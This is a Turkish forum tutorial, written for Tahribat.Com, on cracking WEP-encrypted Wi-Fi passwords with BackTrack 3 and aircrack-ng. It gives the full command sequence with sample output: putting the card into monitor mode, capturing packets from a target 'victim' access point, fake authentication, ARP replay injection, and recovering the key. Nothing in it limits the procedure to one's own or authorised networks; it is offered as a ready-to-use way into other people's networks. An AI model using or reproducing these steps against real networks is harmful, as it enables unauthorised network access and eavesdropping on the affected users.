Wireless Şifresi Kırma

Bu döküman Tahribat.Com için yazılmıştır.

Merhabalar, wireless aglarina son dönemde cogalan ilgiden ötürü ve bircok kez crack nasil yapilir sorulari üzerine bu konuya el atmak istedim.

Öncelikle sunu acikliyayim. Spoof ve Crack islemlerinde linux olmazsa olmaz gereksinimlerdendir. Linux`u zor, anlasilmaz sadece elit kisilerin kullanabilecegi görüntüsü bircok kisinin beynine islemis nedense. Bu tabuyu asmaliyiz.

Baslangic icin Wep sifreleme algoritmasina deginmemin sebebi, bu sifreleme sisteminin en kolay kirilmasindan dolayidir. Wpa algoritmasina ileriki asamalarda deginecegim.

Wireless sifre kirmasinin genel mantigi , hedefin mac adresi snifflenir, gidip gelen paketleri toplanilir, yeterli paket elde edildiginde mac adresi kopyalanir ve sifre elde edilir.

Her şeyin kolaylaştığı bu dönemlerde, bu işlemi yapmak için sadece 5 dk bile yeterli olmaktadır. Bu konu üzerine tasarlanmış olan BackTrack 3 linux modu, wireless cracking icin hertürlü yazilimi sunmaktadir.

Crackinge başlamadan önce gereken temel 2 gereksinim var.

1- BackTrack 3

Download adresi: http://remote-exploit.org/cgi-bin/fileget?version=bt3-cd

2- BackTrack 3 ile uyumlu çalışan bir wireless kartı.

Uyumlu kart listesi: http://backtrack.offensive-security.com/index.php?title=HCL:Wireless

A) Ilk olarak BackTrack 3 ü indirin, boot cd olarak cd ye kaydedin. Bilgisayari cd`den baslatin. Sistem tam olarak acilana kadar sürekli enter tusuna basili tutun.

B) Menüden wlan monitöre girin ve cevrenizdeki wep olan wireless noktalarindan sinyali en yüksek olaninin mac adresini kopyalayin.

C) Simdi crack islemine basliyabiliriz. Öncelikle hangi bilgileri kullanacagimizi belirliyelim.

Kendi MAC Adresimiz:	00:0F:B5:88:AC:82
BSSID (Kurbanin MAC Adresi):	00:14:6C:7E:40:80
ESSID (Kurbanin Baglantisinin ismi):	teddy
Access point kanali:	9
Wireless arayüzü:	ath0

Bu veriler crack isleminde kullanilmis olan örnek veriler. Bunlari birebir kendi bilgilerinizle degistirmeniz gerekiyor.

#####################################################################

Wireless Şifresi Kırma

 

A) Simdi sirayla su islemleri yapin.

1- Konsol u baslatin ve sunu yazin.

airmon-ng stop ath0

Suna benzer bir cevap gelmeli

Interface Chipset Driver

wifi0 Atheros madwifi-ng

ath0 Atheros madwifi-ng VAP (parent: wifi0) (VAP destroyed)

2- Simdi sunu yazin

iwconfig

Suna benzer bir cevap gelmeli

lo no wireless extensions.

eth0 no wireless extensions.

wifi0 no wireless extensions.

3- Simdi sunu yazın

airmon-ng start wifi0 9

Suna benzer bir cevap gelmeli

Interface Chipset Driver

wifi0 Atheros madwifi-ng

ath0 Atheros madwifi-ng VAP (parent: wifi0) (monitor mode enabled)

4- Tekrardan sunu yazin

iwconfig

Suna benzer bir cevap gelmeli

lo no wireless extensions.

wifi0 no wireless extensions.

eth0 no wireless extensions.

ath0 IEEE 802.11g ESSID:"" Nickname:"" Mode:Monitor Frequency:2.452 GHz Access Point: 00:0F:B5:88:AC:82 Bit Rate:0 kb/s Tx-Power:18 dBm Sensitivity=0/3 Retry:off RTS thr:off Fragment thr:off Encryption key:off Power Management:off Link Quality=0/94 Signal level=-95 dBm Noise level=-95 dBm Rx invalid nwid:0 Rx invalid crypt:0 Rx invalid frag:0 Tx excessive retries:0 Invalid misc:0 Missed beacon:0

Wireless Şifresi Kırma

 

5- Simdi sunu yazin

airodump-ng -c 9 --bssid 00:14:6C:7E:40:80 -w output ath0

Suna benzer bir cevap gelmeli

CH 9 ][ Elapsed: 8 mins ][ 2007-03-21 19:25

BSSID PWR RXQ Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID

00:14:6C:7E:40:80 42 100 5240 178307 338 9 54 WEP WEP teddy

BSSID STATION PWR Lost Packets Probes

00:14:6C:7E:40:80 00:0F:B5:88:AC:82 42 0 183782

Konsol penceresini kenara çekin , isleme devam etsin.

Buraya kadar her şey yolunda ise crack işlemini yapmamıza az kaldı.

B) Yeni bir konsol penceresi açın. Sunu yazın

aireplay-ng -1 0 -e teddy -a 00:14:6C:7E:40:80 -h 00:0F:B5:88:AC:82 ath0

Söyle bir cevap gelmeli

18:18:20 Sending Authentication Request

18:18:20 Authentication successful

18:18:20 Sending Association Request

18:18:20 Association successful :-)

C) Yeni bir konsol penceresi daha açın. Sunu yazın

aireplay-ng -3 -b 00:14:6C:7E:40:80 -h 00:0F:B5:88:AC:82 ath0

Söyle bir cevap gelmeli

Saving ARP requests in replay_arp-0321-191525.cap

You should also start airodump-ng to capture replies.

Read 629399 packets (got 316283 ARP requests), sent 210955 packets...

D) Yeni bir konsol penceresi daha açın. Sunu yazın

aircrack-ng -z -b 00:14:6C:7E:40:80 output*.cap

Bu noktadan sonra eğer yeterli paket elde edildiyse söyle bir cevap gelecektir.

Aircrack-ng 0.9 [00:03:06] Tested 674449 keys (got 96610 IVs) KB depth byte(vote) 0 0/ 9 12( 15) F9( 15) 47( 12) F7( 12) FE( 12) 1B( 5) 77( 5) A5( 3) F6( 3) 03( 0) 1 0/ 8 34( 61) E8( 27) E0( 24) 06( 18) 3B( 16) 4E( 15) E1( 15) 2D( 13) 89( 12) E4( 12) 2 0/ 2 56( 87) A6( 63) 15( 17) 02( 15) 6B( 15) E0( 15) AB( 13) 0E( 10) 17( 10) 27( 10) 3 1/ 5 78( 43) 1A( 20) 9B( 20) 4B( 17) 4A( 16) 2B( 15) 4D( 15) 58( 15) 6A( 15) 7C( 15) KEY FOUND! [ 12:34:56:78:90 ] Probability: 100%

Eger böyle bir cevap elde edemediyseniz, ayni işlemi daha fazla paket elde ettikten sonra tekrarlayınız. Ne kadar fazla paket elde ettiyseniz , şifrenin kırılması kesinleşecektir.

Kolay Gelsin.